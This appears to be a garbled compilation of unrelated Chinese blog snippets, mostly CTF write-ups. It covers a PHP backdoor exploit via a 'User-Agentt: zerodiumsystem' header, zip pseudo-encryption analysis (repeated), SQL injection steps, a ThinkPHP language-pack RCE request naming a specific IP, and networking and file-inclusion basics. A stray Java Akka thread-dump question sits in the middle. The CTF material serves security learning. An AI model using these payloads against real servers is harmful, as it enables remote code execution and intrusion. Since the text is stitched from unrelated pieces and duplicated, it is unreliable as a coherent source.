目录【Misc】哇库哇库【Misc】显卡坏了赛后看官方wp给的脚本：【Web】easy_eval【Web】repairman【Crypto】easy_base【Crypto】天知地知（赛后做出）【Crypto】凯撒密码【Reverse】你newbee吗【OSINT】天上的路【OSINT】都可以黑【Pwn】leave_msg【Pwn】easy_login【WARMUP】热身题目赛后根据官方WriteUp做的题【Misc】简单密码1、伪加密2、zip方式解压docx3、字节逆序4、处理zipfile6、base全家桶（1）base92（2）base85-IPv6（3）base58（4）base16

首先进入靶场如下 按照习惯，BP先抓一波包结合题目说的 题目利用了PHP某一开发版本的重大后门，可以利用某写东西进行代码执行。于是想到伪协议操作一下发送给reapter发现伪协议  嗯  不得行不过响应包有个东西引起注意百度发现好家伙 这里有东西 这家伙 有漏洞可以用在Connection字段下面加上User-Agentt:zerodiumsystem("ls/");注意zerodium后面拼接函数发送好家伙!有东西然后替换成这个User-Agentt:zerodiumsystem("cat/flag"); 提交 就完事儿了

下载下来的压缩包是加密的，暴力破解也没有找到密码题目是伪加密，看一下压缩包的十六进制内容一个加密的压缩包，由三部分组成：压缩源文件数据区、压缩源文件目录区、压缩源文件目录结束标志(更详细的请见：一个zip文件由这样三个部分组成_一只独孤的程序猿的博客-CSDN博客)以此题为例来分析一下压缩包的组成部分：1.压缩源文件数据区：504B0304压缩包的文件头标记4bytes1400解压文件所需的pkware版本2bytes0900全局方式位标记2bytes(这里可以来判断有无加密，0奇数00加密，0偶数00无加密)0800压缩方式2bytes50A3最后修改文件时间2bytesA54A最后修改文件

下载下来的压缩包是加密的，暴力破解也没有找到密码题目是伪加密，看一下压缩包的十六进制内容一个加密的压缩包，由三部分组成：压缩源文件数据区、压缩源文件目录区、压缩源文件目录结束标志(更详细的请见：一个zip文件由这样三个部分组成_一只独孤的程序猿的博客-CSDN博客)以此题为例来分析一下压缩包的组成部分：1.压缩源文件数据区：504B0304压缩包的文件头标记4bytes1400解压文件所需的pkware版本2bytes0900全局方式位标记2bytes(这里可以来判断有无加密，0奇数00加密，0偶数00无加密)0800压缩方式2bytes50A3最后修改文件时间2bytesA54A最后修改文件

目录前置知识导图：​TCP/IP体系结构（IP和端口）：IP是什么：是计算机在互联网上的唯一标识（坐标，代号），用于在互联网中寻找计算机。内网（局域网）IP和公网（互联网）IP：内网IP：路由以内的网络，可以连接互联网，但是互联网无法直接连接内网（需要端口映射）如何判断自己的电脑是内网还是公网：公网IP：互联网IP地址。端口是什么：是应用程序（服务）在计算机中的唯一标识。HTTP协议--网站访问的基础：BS架构：浏览器Browser---发送请求--->服务器Server---响应--->浏览器BrowserHTTP协议是什么：超文本传输协议特点：请求消息： ​HTTP常见有八种请求方式，常用

前言CTF（CaptureTheFlag）中文一般译作夺旗赛，在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会，以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。是目前青少年，最喜欢参加的竞赛之一。如何入门？首先，我们必须要了解什么CTF的比赛规则，一般的CTF比赛分为以下两个阶段：1.线上选拔比赛：主要考察的题目范围包括：1.Web安全，2.Reverse（逆向工程）3.Crypto（密码学）4.PWN（二进制）5.Misc（一些混合杂项的电脑知识）2.线下总决赛主要考察：1.AWD（AttackWithDefense

目录web签到题web2考查点：1.判断sql注入回显位置2.查当前数据库名称3.查看数据库表的数量4.查表的名字5.查flag表列的数量6.查flag表列的名字7.查flag表记录的数量8.查flag表记录值web3web4web5 web6web签到题whereisflag？直接F12去找一下  找到  Y3Rmc2hvd3s1YzYyZWE0Mi04M2E5LTRhNDUtODRiMi00NzJkZGViZTcxNGF9通过base64解密，拿到flagweb2查看了hint，直接使用hint中的payload考查点：基本的SQL注入多表联合查询在用户名处注入sql语句，密码随意1.判断

通过AkkaFramework应用程序在Java游戏中解决性能问题。基本上消耗并处理队列中的消息。并在处理每个消息时大量使用外部服务API。在某些情况下，我进入CPU负载问题，试图找到根本原因。这是当CPU〜100％时，是主机之一的线程转储。我看到很多带有sun.misc.unsafe.park的封锁线程，没有看到任何应用程序代码的信息。这些被阻止的人在等待IO吗？你能提出一些提示吗？谢谢1032BLOCKEDthreadsThread34542-threadId:Thread34542-state:BLOCKEDstackTrace:-sun.misc.Unsafe.park(boolean

web1Thinkphplang多语言RCE漏洞，直接打GET/index.php?+config-create+/+/tmp/keep.phpHTTP/1.1Host:47.98.124.175:8080Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/108.0.0.0Safari/537.36Accept:text/html,application/xhtml+x

1、文件包含概念程序开发人员会把重复使用的函数、变量、类等数据写到单个文件中，需要使用到里面的数据时直接调用此文件，而无需再次编写，这种文件调用的过程称为文件包含。2、文件包含相关函数require()//找不到被包含文件时产生错误，停止脚本运行include()//找不到被包含文件时产生警告，脚本继续运行include_once()//与include类似，唯一区别就是文件已经被包含则不再包含require_once()//与require类似，唯一区别就是文件已经被包含则不再包含3、文件包含漏洞介绍程序开发人员希望代码更灵活，所以将被包含文件设置成变量，来进行动态调用，但正是由于这种灵活性